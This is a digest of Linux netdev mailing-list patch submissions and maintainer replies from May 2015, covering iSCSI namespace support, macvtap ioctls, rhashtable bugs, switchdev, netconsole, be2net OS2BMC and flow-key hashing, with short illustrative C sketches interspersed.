Re: [net-next PATCH] net: Reserve skb headroom and set skb->dev even if using __alloc_skb
From: Alexander Duyck <alexander.h.du...@redhat.com>
Date: Wed, 13 May 2015 13:34:13 -0700

> When I had inlined __alloc_rx_skb into __netdev_alloc_skb and
> __napi_alloc_skb I had overlooked the fact that there was a return in the
> __alloc_rx_skb. As a result we weren't reserving headroom or setting the
> skb->dev in certain cases. This change corrects that by adding a couple of
> jump labels to jump to depending on __alloc_skb either succeeding or failing.
>
> Fixes: 9451980a6646 ("net: Use cached copy of pfmemalloc to avoid accessing page")
> Reported-by: Felipe Balbi <ba...@ti.com>
> Signed-off-by: Alexander Duyck <alexander.h.du...@redhat.com>

Applied, thanks.
[RFC PATCH 0/4] Make iSCSI network namespace aware
I've had a few reports of people trying to run iscsid in a container,
which doesn't work at all when using network namespaces. This is the
start of me looking at what it would take to make that work, and if it
makes sense at all.

The first issue is that the kernel side of the iSCSI netlink control
protocol only operates in the initial network namespace. But beyond
that, if we allow iSCSI to be managed within a namespace we need to
decide what that means. I think it makes the most sense to isolate the
iSCSI host, along with its associated endpoints, connections, and
sessions, to a network namespace and allow multiple instances of the
userspace tools to exist in separate namespaces managing separate hosts.

It works well for iscsi_tcp, which creates a host per session. There's
no attempt to manage sessions on offloading hosts independently,
although future work could include the ability to move an entire host to
a new namespace like is supported for network devices.

This is only about the structures and functionality involved in
maintaining the iSCSI session; the SCSI host along with its discovered
targets and devices has no association with network namespaces.

These patches are functional, but not complete. There's no isolation
enforced in the kernel just yet, so it relies on well behaved userspace.
I plan on fixing that, but wanted some feedback on the idea and approach
so far.

Thanks,
Chris

Chris Leech (4):
  iscsi: create per-net iscsi nl kernel sockets
  iscsi: sysfs filtering by network namespace
  iscsi: make all netlink multicast namespace aware
  iscsi: set netns for iscsi_tcp hosts

 drivers/scsi/iscsi_tcp.c            |   7 +
 drivers/scsi/scsi_transport_iscsi.c | 264 +---
 include/scsi/scsi_transport_iscsi.h |   2 +
 3 files changed, 222 insertions(+), 51 deletions(-)

-- 
2.1.0
[RFC PATCH 4/4] iscsi: set netns for iscsi_tcp hosts
This lets iscsi_tcp operate in multiple namespaces. It uses current
during session creation to find the net namespace, but it might be
better to manage to pass it along from the iscsi netlink socket.
---
 drivers/scsi/iscsi_tcp.c            | 7 +++++++
 drivers/scsi/scsi_transport_iscsi.c | 7 ++++++-
 include/scsi/scsi_transport_iscsi.h | 1 +
 3 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
index 0b8af18..ebe99da 100644
--- a/drivers/scsi/iscsi_tcp.c
+++ b/drivers/scsi/iscsi_tcp.c
@@ -948,6 +948,11 @@ static int iscsi_sw_tcp_slave_configure(struct scsi_device *sdev)
 	return 0;
 }
 
+static struct net *iscsi_sw_tcp_netns(struct Scsi_Host *shost)
+{
+	return current->nsproxy->net_ns;
+}
+
 static struct scsi_host_template iscsi_sw_tcp_sht = {
 	.module = THIS_MODULE,
 	.name = "iSCSI Initiator over TCP/IP",
@@ -1003,6 +1008,8 @@ static struct iscsi_transport iscsi_sw_tcp_transport = {
 	.alloc_pdu = iscsi_sw_tcp_pdu_alloc,
 	/* recovery */
 	.session_recovery_timedout = iscsi_session_recovery_timedout,
+	/* net namespace */
+	.get_netns = iscsi_sw_tcp_netns,
 };
 
 static int __init iscsi_sw_tcp_init(void)
diff --git a/drivers/scsi/scsi_transport_iscsi.c b/drivers/scsi/scsi_transport_iscsi.c
index 4fdd4bf..791aacd 100644
--- a/drivers/scsi/scsi_transport_iscsi.c
+++ b/drivers/scsi/scsi_transport_iscsi.c
@@ -1590,11 +1590,16 @@ static int iscsi_setup_host(struct transport_container *tc, struct device *dev,
 {
 	struct Scsi_Host *shost = dev_to_shost(dev);
 	struct iscsi_cls_host *ihost = shost->shost_data;
+	struct iscsi_internal *priv = to_iscsi_internal(shost->transportt);
+	struct iscsi_transport *transport = priv->iscsi_transport;
 
 	memset(ihost, 0, sizeof(*ihost));
 	atomic_set(&ihost->nr_scans, 0);
 	mutex_init(&ihost->mutex);
-	ihost->netns = &init_net;
+	if (transport->get_netns)
+		ihost->netns = transport->get_netns(shost);
+	else
+		ihost->netns = &init_net;
 
 	iscsi_bsg_host_add(shost, ihost);
 	/* ignore any bsg add error - we just can't do sgio */
diff --git a/include/scsi/scsi_transport_iscsi.h b/include/scsi/scsi_transport_iscsi.h
index 860ac0c..878bcf2 100644
--- a/include/scsi/scsi_transport_iscsi.h
+++ b/include/scsi/scsi_transport_iscsi.h
@@ -168,6 +168,7 @@ struct iscsi_transport {
 	int (*logout_flashnode_sid) (struct iscsi_cls_session *cls_sess);
 	int (*get_host_stats) (struct Scsi_Host *shost, char *buf, int len);
 	u8 (*check_protection)(struct iscsi_task *task, sector_t *sector);
+	struct net *(*get_netns)(struct Scsi_Host *shost);
 };
 
 /*
-- 
2.1.0
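The shape of the change in this patch, an optional per-transport
callback with a fallback to the initial namespace, can be tried out in
userspace with stand-in types. Everything prefixed demo_ below is
hypothetical and only mirrors the structure of the patch; none of it is
the SCSI or networking API.

```c
#include <stddef.h>

/* Stand-in for a network namespace. */
struct demo_net { int id; };

static struct demo_net demo_init_net = { 0 };	/* plays the role of init_net */
static struct demo_net demo_other_net = { 1 };	/* some non-initial namespace */

struct demo_host;

/* Transport ops table; get_netns is optional and may be NULL. */
struct demo_transport {
	struct demo_net *(*get_netns)(struct demo_host *host);
};

struct demo_host {
	const struct demo_transport *transport;
	struct demo_net *netns;
};

/* Example callback, as a transport that knows its namespace would provide. */
static struct demo_net *demo_tcp_netns(struct demo_host *host)
{
	(void)host;
	return &demo_other_net;
}

/* Host setup: ask the transport if it can tell us, else use the initial ns. */
static void demo_setup_host(struct demo_host *host)
{
	if (host->transport->get_netns)
		host->netns = host->transport->get_netns(host);
	else
		host->netns = &demo_init_net;
}
```

Transports that leave the callback NULL keep today's behaviour (hosts
live in the initial namespace), so only transports that opt in, such as
iscsi_tcp in this RFC, change where their hosts show up.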
Re: [PATCH v5] macvtap add missing ioctls
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 12:35:16 +0100

The macvtap driver tries to emulate all the ioctls supported by a normal tun/tap driver, however it was missing the generic SIOCGIFHWADDR and SIOCSIFHWADDR ioctls to get and set the mac address that are supported by tun/tap. This patch adds these.

Signed-off-by: Justin Cormack jus...@netbsd.org

As I stated, you cannot just send a new version of a patch I already applied to my tree. It is in the permanent GIT commit record, and cannot be removed. Therefore, you must send a relative fix.
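For readers unfamiliar with the ioctls named in the patch description, here is a small userspace sketch of SIOCGIFHWADDR, assuming Linux and glibc-style headers. It issues the request on an ordinary AF_INET socket and looks the interface up by name; on a tun/tap or macvtap device the same request would be issued on the opened tap file descriptor instead. The helper name example_get_hwaddr is made up for this sketch.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <net/if.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <unistd.h>

/*
 * Copy the hardware (MAC) address of interface `ifname` into mac[6].
 * Returns 0 on success, -1 if the socket or the ioctl fails.
 */
static int example_get_hwaddr(const char *ifname, unsigned char mac[6])
{
	struct ifreq ifr;
	int fd, ret;

	assert(ifname != NULL);

	fd = socket(AF_INET, SOCK_DGRAM, 0);
	if (fd < 0)
		return -1;

	memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);

	/* The kernel fills ifr.ifr_hwaddr for the named interface. */
	ret = ioctl(fd, SIOCGIFHWADDR, &ifr);
	close(fd);
	if (ret < 0)
		return -1;

	memcpy(mac, ifr.ifr_hwaddr.sa_data, 6);
	return 0;
}
```

SIOCSIFHWADDR takes the same struct ifreq with ifr_hwaddr filled in by the caller, and normally needs CAP_NET_ADMIN.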
Re: netlink rhashtable status
From: Eric Dumazet eric.duma...@gmail.com
Date: Wed, 13 May 2015 09:18:04 -0700

On Wed, 2015-05-13 at 06:04 -0700, Eric Dumazet wrote:

On Wed, 2015-05-13 at 14:20 +0800, Herbert Xu wrote:

On Tue, May 12, 2015 at 11:15:40PM -0700, Eric Dumazet wrote:

Trick is to start about 200 threads using getaddrinfo()

When it loses the kernel socket, is it permanent or intermittent? I'm trying to figure out whether it's the hashtable reader missing an entry that's there or whether the hashtable has been corrupted and an entry is gone forever.

Cheers,

This is permanent. We have to reboot the host.

For 4.0.3 I replaced the two rhashtable files by current Linus version, and problem is gone, so the fix is not in net/netlink

 include/linux/rhashtable.h | 10
 lib/rhashtable.c | 582 ---
 2 files changed, 215 insertions(+), 377 deletions(-)

I did a bisection but ended to 393619474ec0 rhashtable: Fix read-side crash during rehash

And simply backporting it does not solve the problem

Backporting all of the rhashtable bits is going to be really painful and potentially quite risky. However, if someone is confident enough, I'm willing to entertain this idea.

Alternatively, we could consider reverting the rhashtable conversion of netlink in the interim. It might be the safest solution for -stable.
Re: [PATCH v4] macvtap add missing ioctls - fix wrapping
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 11:06:01 +0100

On Tue, 2015-05-12 at 23:01 -0400, David Miller wrote:

From: Justin Cormack jus...@myriabit.com
Date: Mon, 11 May 2015 20:00:10 +0100

The macvtap driver tries to emulate all the ioctls supported by a normal tun/tap driver, however it was missing the generic SIOCGIFHWADDR and SIOCSIFHWADDR ioctls to get and set the mac address that are supported by tun/tap. This patch adds these.

Signed-off-by: Justin Cormack jus...@netbsd.org

Applied to net-next, thanks.

The kbuild test picked up a stupid error, should I send a new patch version, or a patch against net-next?

Patches are never removable from my tree, so you must always send relative fixes.
Re: [PATCH net-next] rename RTNH_F_EXTERNAL to RTNH_F_OFFLOAD
From: roopa ro...@cumulusnetworks.com
Date: Wed, 13 May 2015 06:38:02 -0700

On 5/13/15, 1:26 AM, Daniel Borkmann wrote:

On 05/13/2015 07:42 AM, Jiri Pirko wrote:

Wed, May 13, 2015 at 07:27:10AM CEST, ro...@cumulusnetworks.com wrote:

From: Roopa Prabhu ro...@cumulusnetworks.com

RTNH_F_EXTERNAL today is printed as offload in iproute2 output. This patch renames the flag to be consistent with what the user sees. (I will post iproute2 patch if this gets accepted)

Signed-off-by: Roopa Prabhu ro...@cumulusnetworks.com
---
 include/uapi/linux/rtnetlink.h |2 +-
 net/ipv4/fib_trie.c|2 +-
 net/switchdev/switchdev.c |6 +++---
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/include/uapi/linux/rtnetlink.h b/include/uapi/linux/rtnetlink.h
index 974db03..17fb02f 100644
--- a/include/uapi/linux/rtnetlink.h
+++ b/include/uapi/linux/rtnetlink.h
@@ -337,7 +337,7 @@ struct rtnexthop {
 #define RTNH_F_DEAD		1	/* Nexthop is dead (used by multipath) */
 #define RTNH_F_PERVASIVE	2	/* Do recursive gateway lookup */
 #define RTNH_F_ONLINK		4	/* Gateway is forced on link */
-#define RTNH_F_EXTERNAL		8	/* Route installed externally */
+#define RTNH_F_OFFLOAD		8	/* offloaded route */

Since this is part of uapi, I believe this is not doable :/

i thought it was not too late :) and besides i wasn't changing the value and just the name. current iproute2 would still build for example.

If it made it into a release kernel, you cannot change it. Period.
Re: [PATCH net-next 0/4] switchdev: more (minor) cleanups
From: sfel...@gmail.com
Date: Tue, 12 May 2015 23:03:50 -0700

Fix some sparse warnings and include some documentation review comments that didn't get picked up in the switchdev Spring Cleanup series.

Series applied, thanks Scott.
Re: [PATCH net-next] switchdev: don't use anonymous union on switchdev attr/obj structs
From: sfel...@gmail.com
Date: Wed, 13 May 2015 11:16:50 -0700

From: Scott Feldman sfel...@gmail.com

Older gcc versions (e.g. gcc version 4.4.6) don't like anonymous unions which was causing build issues on the newly added switchdev attr/obj structs. Fix this by using named union on structs.

Signed-off-by: Scott Feldman sfel...@gmail.com
Reported-by: Or Gerlitz ogerl...@mellanox.com

Applied, thanks.
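To illustrate the shape of the fix, here is a sketch of a struct whose variant data sits in a named union. It assumes the build trouble was with initializing members of an anonymous union, which the thread does not spell out. The example_* types and the union name u are invented for this sketch and are not the switchdev definitions.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical payloads, loosely modelled on "vlan" and "ipv4_fib". */
struct example_vlan { unsigned short vid_start, vid_end; };
struct example_fib { unsigned int dst; int dst_len; };

enum example_obj_id { EXAMPLE_OBJ_VLAN, EXAMPLE_OBJ_FIB };

struct example_obj {
	enum example_obj_id id;
	union {
		struct example_vlan vlan;
		struct example_fib fib;
	} u;	/* named union: members are reached as obj.u.vlan, obj.u.fib */
};

/* Designated initializer that goes through the union's name. */
static const struct example_obj example_vlan_obj = {
	.id = EXAMPLE_OBJ_VLAN,
	.u.vlan = { .vid_start = 10, .vid_end = 20 },
};

/* Accessor that checks the tag before reading the union. */
static unsigned short example_first_vid(const struct example_obj *obj)
{
	assert(obj != NULL && obj->id == EXAMPLE_OBJ_VLAN);
	return obj->u.vlan.vid_start;
}
```

The cost of naming the union is one extra path component at every access site, which is the churn the applied patch accepts in exchange for building on older compilers.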
Re: [PATCH net-next] fix missing copy_from_user in macvtap
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 19:19:02 +0100

Fix missing copy_from_user in macvtap SIOCSIFHWADDR ioctl.

Signed-off-by: Justin Cormack jus...@netbsd.org

Applied.
Re: [PATCH 4/4] netconsole: implement extended console support
From: Tejun Heo t...@kernel.org
Date: Wed, 13 May 2015 11:46:20 -0400

Hello, David.

On Tue, May 12, 2015 at 07:23:22PM -0400, David Miller wrote:

Second question, is there an upper bound on this header size? Because if there is, it seems to me that there is no reason why we can't just avoid the fragmentation support altogether. The current code limits to 1000 bytes, and that limit seems arbitrary. Obviously this code is meant to work on interfaces with an ethernet MTU or larger. So you could bump the limit enough to accommodate the new header size, yet still be within the real constraints. What do you think?

Yeah, if we can bump the tx size enough to accommodate all messages, it'd be great. It can get fairly large tho. The absolute maximum right now is 8k. While regular printk message bodies are capped slightly below 1k, the dictionary printed through vprintk_emit() doesn't have such length limit. Another factor is that non-printables are escaped using \xXX and vprintk_emit() is supposed to be useable with transmitting binary data (like low level device error descriptors) although I'm not sure anybody is doing that yet.

Yeah, 8K is too much to handle, oh well. Ok I'm fine with this series from my end, and you can merge this wherever the extended console support bits go.

Signed-off-by: David S. Miller da...@davemloft.net

Thanks.
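The size concern above follows from the \xXX escaping: every escaped byte becomes four output characters, so a binary payload can grow up to fourfold. A rough userspace sketch of such an escaper is below. The function name and the exact set of escaped bytes (control characters, bytes at or above 0x7f, and the backslash itself) are assumptions made for illustration, not a copy of the kernel code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Copy src[0..len) into dst, writing bytes that are not printable
 * ASCII (and the backslash) as \xXX. Output is NUL-terminated and
 * truncated if dst is too small. Returns the number of characters
 * written, not counting the terminating NUL.
 */
static size_t example_escape(const unsigned char *src, size_t len,
			     char *dst, size_t dst_size)
{
	size_t out = 0;
	size_t i;

	assert(dst != NULL && dst_size > 0);

	for (i = 0; i < len; i++) {
		unsigned char c = src[i];
		int esc = c < 0x20 || c >= 0x7f || c == '\\';
		size_t need = esc ? 4 : 1;

		/* Keep one byte free for the terminating NUL. */
		if (out + need >= dst_size)
			break;

		if (esc)
			snprintf(dst + out, 5, "\\x%02x", c);
		else
			dst[out] = (char)c;
		out += need;
	}
	dst[out] = '\0';
	return out;
}
```

With this scheme a three-byte input holding one newline needs six output characters, and an all-binary payload needs four times its length.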
[PATCH net-next 3/3] be2net: Support for OS2BMC.
OS2BMC feature will allow the server to communicate with the on-board BMC/idrac (Baseboard Management Controller) over the LOM via standard Ethernet.

When OS2BMC feature is enabled, the LOM will filter traffic coming from the host. If the destination MAC address matches the iDRAC MAC address, it will forward the packet to the NC-SI side band interface for iDRAC processing. Otherwise, it would send it out on the wire to the external network. Broadcast and multicast packets are sent on the side-band NC-SI channel and on the wire as well. Some of the packet filters are not supported in the NIC and hence driver will identify such packets and will hint the NIC to send those packets to the BMC. This is done by duplicating packets on the management ring. Packets are sent to the management ring, by setting mgmt bit in the wrb header. The NIC will forward the packets on the management ring to the BMC through the side-band NC-SI channel.

Please refer to this online document for more details,
http://www.dell.com/downloads/global/products/pedge/os_to_bmc_passthrough_a_new_chapter_in_system_management.pdf

Signed-off-by: Venkat Duvvuru venkatkumar.duvv...@emulex.com
---
 drivers/net/ethernet/emulex/benet/be.h |8 ++-
 drivers/net/ethernet/emulex/benet/be_cmds.c | 19
 drivers/net/ethernet/emulex/benet/be_cmds.h | 17
 drivers/net/ethernet/emulex/benet/be_main.c | 138 +++
 4 files changed, 181 insertions(+), 1 deletions(-)

diff --git a/drivers/net/ethernet/emulex/benet/be.h b/drivers/net/ethernet/emulex/benet/be.h
index 63922d4..8d12b41 100644
--- a/drivers/net/ethernet/emulex/benet/be.h
+++ b/drivers/net/ethernet/emulex/benet/be.h
@@ -384,6 +384,7 @@ enum vf_state {
 #define BE_FLAGS_SETUP_DONE			BIT(9)
 #define BE_FLAGS_EVT_INCOMPATIBLE_SFP		BIT(10)
 #define BE_FLAGS_ERR_DETECTION_SCHEDULED	BIT(11)
+#define BE_FLAGS_OS2BMC				BIT(12)
 
 #define BE_UC_PMAC_COUNT			30
 #define BE_VF_UC_PMAC_COUNT			2
@@ -428,6 +429,8 @@ struct be_resources {
 	u32 vf_if_cap_flags;	/* VF if capability flags */
 };
 
+#define be_is_os2bmc_enabled(adapter) (adapter->flags & BE_FLAGS_OS2BMC)
+
 struct rss_info {
 	u64 rss_flags;
 	u8 rsstable[RSS_INDIR_TABLE_LEN];
@@ -461,7 +464,8 @@ enum {
 	BE_WRB_F_LSO_BIT,		/* LSO */
 	BE_WRB_F_LSO6_BIT,		/* LSO6 */
 	BE_WRB_F_VLAN_BIT,		/* VLAN */
-	BE_WRB_F_VLAN_SKIP_HW_BIT	/* Skip VLAN tag (workaround) */
+	BE_WRB_F_VLAN_SKIP_HW_BIT,	/* Skip VLAN tag (workaround) */
+	BE_WRB_F_OS2BMC_BIT		/* Send packet to the management ring */
 };
 
 /* The structure below provides a HW-agnostic abstraction of WRB params
@@ -584,6 +588,8 @@ struct be_adapter {
 	struct be_hwmon hwmon_info;
 	u8 pf_number;
 	struct rss_info rss_info;
+	/* Filters for packets that need to be sent to BMC */
+	u32 bmc_filt_mask;
 };
 
 #define be_physfn(adapter)		(!adapter->virtfn)
diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c b/drivers/net/ethernet/emulex/benet/be_cmds.c
index dce8786..4115054 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.c
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.c
@@ -333,6 +333,21 @@ static void be_async_grp5_pvid_state_process(struct be_adapter *adapter,
 	}
 }
 
+#define MGMT_ENABLE_MASK	0x4
+static void be_async_grp5_fw_control_process(struct be_adapter *adapter,
+					     struct be_mcc_compl *compl)
+{
+	struct be_async_fw_control *evt = (struct be_async_fw_control *)compl;
+	u32 evt_dw1 = le32_to_cpu(evt->event_data_word1);
+
+	if (evt_dw1 & MGMT_ENABLE_MASK) {
+		adapter->flags |= BE_FLAGS_OS2BMC;
+		adapter->bmc_filt_mask = le32_to_cpu(evt->event_data_word2);
+	} else {
+		adapter->flags &= ~BE_FLAGS_OS2BMC;
+	}
+}
+
 static void be_async_grp5_evt_process(struct be_adapter *adapter,
 				      struct be_mcc_compl *compl)
 {
@@ -349,6 +364,10 @@ static void be_async_grp5_evt_process(struct be_adapter *adapter,
 	case ASYNC_EVENT_PVID_STATE:
 		be_async_grp5_pvid_state_process(adapter, compl);
 		break;
+	/* Async event to disable/enable os2bmc and/or mac-learning */
+	case ASYNC_EVENT_FW_CONTROL:
+		be_async_grp5_fw_control_process(adapter, compl);
+		break;
 	default:
 		break;
 	}
diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.h b/drivers/net/ethernet/emulex/benet/be_cmds.h
index c713d51..2716e6f 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.h
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.h
@@ -105,6 +105,7 @@ struct be_mcc_compl {
 #define ASYNC_DEBUG_EVENT_TYPE_QNQ	1
 #define ASYNC_EVENT_CODE_SLIPORT	0x11
 #define
Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure
From: Tom Herbert t...@herbertland.com
Date: Wed, 13 May 2015 15:37:50 -0400

On Wed, May 13, 2015 at 3:30 PM, David Miller da...@davemloft.net wrote:

From: Tom Herbert t...@herbertland.com
Date: Tue, 12 May 2015 08:22:58 -0700

@@ -15,6 +15,13 @@
  * All the members, except thoff, are in network byte order.
  */
 struct flow_keys {
+	u16 thoff;
+	u16 padding1;
+#define FLOW_KEYS_HASH_START_FIELD	n_proto
+	__be16 n_proto;
+	u8 ip_proto;
+	u8 padding;
+

This padding works if everyone consistently zero initializes the whole key structure, but for whatever reason (performance, unintentional oversight, etc.) not all paths do. So, for example, inet_set_txhash() is going to have random crap in keys.padding, so the hashes computed are not stable for a given flow key tuple. That's just the first code path I found with this issue, there are probably several others.

memset zero is in the second patch for inet_set_txhash and ip6_set_txhash. I can respin so those are in the first patch.

Yes, for bisectability you should probably do that.
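The padding concern can be reproduced in userspace. The sketch below hashes the raw bytes of a key struct starting at n_proto, so any stray value in the padding byte changes the result even when the flow tuple is identical. The struct is a cut-down, hypothetical mirror of the quoted fields plus two made-up address fields, and FNV-1a stands in for whatever hash the kernel actually uses.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical cut-down key; explicit padding, no implicit holes. */
struct example_keys {
	uint16_t thoff;		/* not part of the hashed region */
	uint16_t padding1;
	uint16_t n_proto;	/* hashing starts at this field */
	uint8_t ip_proto;
	uint8_t padding;
	uint32_t src;
	uint32_t dst;
};

/* FNV-1a over the raw bytes from n_proto to the end of the struct. */
static uint32_t example_hash(const struct example_keys *k)
{
	size_t start = offsetof(struct example_keys, n_proto);
	const unsigned char *p = (const unsigned char *)k + start;
	size_t len = sizeof(*k) - start;
	uint32_t h = 2166136261u;
	size_t i;

	assert(k != NULL);
	for (i = 0; i < len; i++) {
		h ^= p[i];
		h *= 16777619u;
	}
	return h;
}

/* Zero the whole struct first so padding bytes are deterministic. */
static void example_keys_init(struct example_keys *k, uint16_t n_proto,
			      uint8_t ip_proto, uint32_t src, uint32_t dst)
{
	memset(k, 0, sizeof(*k));
	k->n_proto = n_proto;
	k->ip_proto = ip_proto;
	k->src = src;
	k->dst = dst;
}
```

Two keys built through example_keys_init() with the same tuple hash identically; setting only the named fields on an uninitialized stack variable gives no such guarantee, which is the case the memset in the second patch closes.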
Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower
From: Tom Herbert t...@herbertland.com
Date: Wed, 13 May 2015 15:27:59 -0400

I'm sure there will be some performance improvements possible, and I hope you will look into making sure this new programmable classifier is as light weight as possible.

...

I still have concerns about making flow_dissector more complex like this. It still seems like this programmable logic should be done in a separate function. We call flow_dissector at least once per packet via skb_get_hash, it is in the critical path, and adding several conditionals can only slow it down and provides no new value to skb_get_hash. At the very least can we get some performance numbers to show impact of this?

The part of what I said to Jiri above is meant exactly to ensure that he handles this. If we need a specialized fast path for the skb_get_hash() code paths, so be it. But I'm not going to denounce his entire efforts for something that hasn't even been shown to be an issue yet. And if it is, I'm sure Jiri will work to address it.